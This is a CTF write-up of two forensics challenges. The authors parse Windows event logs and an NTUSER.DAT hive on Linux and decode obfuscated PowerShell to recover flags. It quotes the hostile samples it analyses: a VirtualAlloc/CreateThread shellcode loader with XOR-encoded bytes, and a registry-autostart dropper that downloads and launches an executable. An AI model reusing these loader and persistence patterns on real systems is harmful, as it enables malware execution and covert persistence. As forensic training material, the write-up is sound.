HTB 2022 Cyber Apocalypse CTF - Forensics category writeups

 Forensics 1: Puppeteer

The challenge has a download, and the description ends with the following line:

Help her analyse the Council’s HQ event logs and solve this mystery.

Unzipping the download reveals a list of 143 Windows event log files (with the .evtx extension).

We’re usually working on a Linux system, and didn’t have a Windows system at hand, so we had to find a Linux program which can parse these files for us. We found that evtxexport from the libevtx-utils package (from the Kali repositories) was able to do this for us. This program only accepts a single input file, which means we would need to look at all 143 files separately.

Except that evtxexport reports that some files do not contain any records:

$ evtxexport Setup.evtx
evtxexport 20181227

No records to export.

Looking at which files do not have any content, we found that files which are exatly 69632 bytes large, do not contain any content at all. This means we can remove 120 files from the list that we need to check. Removing these can easily be done with the find command:

find . -size 69632c -exec rm {} +

From the remaining files, we started with the Application.evtx file, which contained some entries about Python and pip, which could be interesting. It also contains some entries which contain the string rm/algorithm/flags/1.0, which we thought might reference a file that contains the flag. But it didn’t contain enough information for us to see what the next steps would be, so we went on to the other log files.

Instead of going through them one-by-one, we decided to employ find once again, and pipe it to less so we can see all output at once:

find . -type f -exec evtxexport {} ';' | less

And this had a very nice side effect: the Microsoft-Windows-PowerShell%4Operational.evtx log file was the first file that find would execute the evtxexport tool on.

This was very nice as it contains the following PowerShell script:

$OleSPrlmhB = @"
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lp
Parameter, uint dwCreationFlags, IntPtr lpThreadId);

[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb
9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa
5, 0xe1, 0xe1;

$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0


$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);

$stage3 = $stage1 + $stage2;


# Unpack Shellcode;

for($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)
    $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;

#Unpack Special Orders!

for($i=0;$i -lt $stage3.count;$i++){
    $stage3[$i] = $stage3[$i] -bxor 0xd1;


This PowerShell script was interesting to us for three main reasons:

  1. It contains multiple stages,
  2. It claims to contain shellcode, and
  3. It claims to contain “Special Orders”

This was enough for us to check what this script does, before looking at the other log files for the moment.

If we had a Windows virtual machine we could have probably reworked the script to print everything, by making the script safe and executing it on the Windows virtual machine (if you do this, make sure you are 100% certain that there is no longer any malicious behaviour in the script). But we do not have a Windows virtual machine ready for this.

Luckily, the operations that are performed are quite easy to understand. So we wrote a Python script to work back from the stages to find exactly what stage3 contains:

#!/usr/bin/env python3

stage1 = [0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3]
stage2 = [0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1]

# Reverse stage2
stage2 = stage2[::-1]

stage3 = stage1 + stage2

# Unpack

stage3 = [x ^ 0xd1 for x in stage3]

print("".join([chr(x) for x in stage3]))

Running this script prints the flag:


The main lesson we learned from this challenge was how to use Windows log files on a Linux machine.

 Forensics 2: Golden Persistence

This challenge has a download, and the description contains the following:

Emergency! A space station near Urkir was compromised. […] Help Miyuki find their persistence mechanisms so they cannot gain access again.

And the download contains a NTUSER.DAT file.

While we know this is a file with special meaning on Windows, we were not familiar with using it. To get an idea we just looked at it with cat, which gives a lot of data. But within that data, the following stood out for obvious reasons:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc ZgB1AG4AYwB0AGkAbwBuACAAZQBuAGMAcgAgAHsACgAgACAAIA[...]

The -enc flag means that the argument is base64-encoded, so we decoded it to find the following script:

function encr {

    [Byte[]]$buffer = New-Object Byte[] $data.Length
    $data.CopyTo($buffer, 0)

    [Byte[]]$s = New-Object Byte[] 256;
    [Byte[]]$k = New-Object Byte[] 256;

    for ($i = 0; $i -lt 256; $i++)
        $s[$i] = [Byte]$i;
        $k[$i] = $key[$i % $key.Length];

    $j = 0;
    for ($i = 0; $i -lt 256; $i++)
        $j = ($j + $s[$i] + $k[$i]) % 256;
        $temp = $s[$i];
        $s[$i] = $s[$j];
        $s[$j] = $temp;

    $i = $j = 0;
    for ($x = 0; $x -lt $buffer.Length; $x++)
        $i = ($i + 1) % 256;
        $j = ($j + $s[$i]) % 256;
        $temp = $s[$i];
        $s[$i] = $s[$j];
        $s[$j] = $temp;
        [int]$t = ($s[$i] + $s[$j]) % 256;
        $buffer[$x] = $buffer[$x] -bxor $s[$t];

    return $buffer

function HexToBin {
    $return = @()

    for ($i = 0; $i -lt $s.Length ; $i += 2)
        $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber)

    Write-Output $return

[Byte[]]$key = $enc.GetBytes("Q0mmpr4B5rvZi3pS")
$encrypted1 = (Get-ItemProperty -Path HKCU:\SOFTWARE\ZYb78P4s).t3RBka5tL
$encrypted2 = (Get-ItemProperty -Path HKCU:\SOFTWARE\BjqAtIen).uLltjjW
$encrypted3 = (Get-ItemProperty -Path HKCU:\SOFTWARE\AppDataLow\t03A1Stq).uY4S39Da
$encrypted4 = (Get-ItemProperty -Path HKCU:\SOFTWARE\Google\Nv50zeG).Kb19fyhl
$encrypted5 = (Get-ItemProperty -Path HKCU:\AppEvents\Jx66ZG0O).jH54NW8C
$encrypted = "$($encrypted1)$($encrypted2)$($encrypted3)$($encrypted4)$($encrypted5)"
$enc = [System.Text.Encoding]::ASCII
[Byte[]]$data = HexToBin $encrypted
$DecryptedBytes = encr $data $key
$DecryptedString = $enc.GetString($DecryptedBytes)

Now this looks promising, so we want to see what the $DecryptedString actually contains. But it is depending on entries that come from the Windows registry, and we don’t have those values yet.

But these values are actually present in NTUSER.DAT. You just need the right tools to get them out. At first we tried to use regripper to get them out, but we couldn’t get this to work (it did find the same PowerShell script that we found already, and showed that is was in the Autostart key contents, which provided the persistence). So to find the values, we switched to reged:

$ reged -x NTUSER.DAT "HKEY_CURRENT_USER\\SOFTWARE" \\ software.reg
$ reged -x NTUSER.DAT "HKEY_CURRENT_USER\\AppEvents" \\ appevents.reg

This gives the software.reg and appevents.reg files, which contain all the data that we need like this: (excerpt from software.reg)


Now we have the values, we still have the same issue we had with Forensics 1: we don’t have PowerShell. But while it took a little longer to rewrite it in Python, we were still able to:

#!/usr/bin/env python3

key = b"Q0mmpr4B5rvZi3pS"

encrypted1 = "F844A6035CF27CC4C90DFEAF579398BE6F7D5ED10270BD12A661DAD04191347559B82ED546015B07317000D8909939A4DA7953AED8B83C0FEE4EB6E120372F536BC5DC39"
encrypted2 = "CC19F66A5F3B2E36C9B810FE7CC4D9CE342E8E00138A4F7F5CDD9EED9E09299DD7C6933CF4734E12A906FD9CE1CA57D445DB9CABF850529F5845083F34BA1"
encrypted3 = "C08114AA67EB979D36DC3EFA0F62086B947F672BD8F966305A98EF93AA39076C3726B0EDEBFA10811A15F1CF1BEFC78AFC5E08AD8CACDB323F44B4D"
encrypted4 = "D814EB4E244A153AF8FAA1121A5CCFD0FEAC8DD96A9B31CCF6C3E3E03C1E93626DF5B3E0B141467116CC08F92147F7A0BE0D95B0172A7F34922D6C236BC7DE54D8ACBFA70D1"
encrypted5 = "84AB553E67C743BE696A0AC80C16E2B354C2AE7918EE08A0A3887875C83E44ACA7393F1C579EE41BCB7D336CAF8695266839907F47775F89C1F170562A6B0A01C0F3BC4CB"

encrypted = encrypted1 + encrypted2 + encrypted3 + encrypted4 + encrypted5

encrypted = bytes.fromhex(encrypted)

s = []
k = []
# First loop
for i in range(0, 256):
    k.append(key[i % len(key)])

j = 0
# Second loop
for i in range(0, 256):
    j = (j + s[i] + k[i]) % 256
    temp = s[i]
    s[i] = s[j]
    s[j] = temp

i = 0
j = 0
# Third loop
output = []
for x in range(len(encrypted)):
    i = (i + 1) % 256
    j = (j + s[i]) % 256
    temp = s[i]
    s[i] = s[j]
    s[j] = temp
    t = (s[i] + s[j]) % 256
    output.append(encrypted[x] ^ s[t])

print("".join([chr(x) for x in output]))

Executing this script gives us the following:

$path ="C:\ProgramData\windows\goldenf.exe";$exists = Test-Path -Path $path -PathType Leaf;if ( $exists ){Start-Process $path}else{mkdir "C:\ProgramData\windows";Invoke-WebRequest -Uri -OutFile $path;$flag="HTB{g0ld3n_F4ng_1s_n0t_st34lthy_3n0ugh}";Start-Process $path}

Which contains the flag:


This challenge mostly learned us how to use the NTUSER.DAT file from Linux, which is something we hadn’t done before.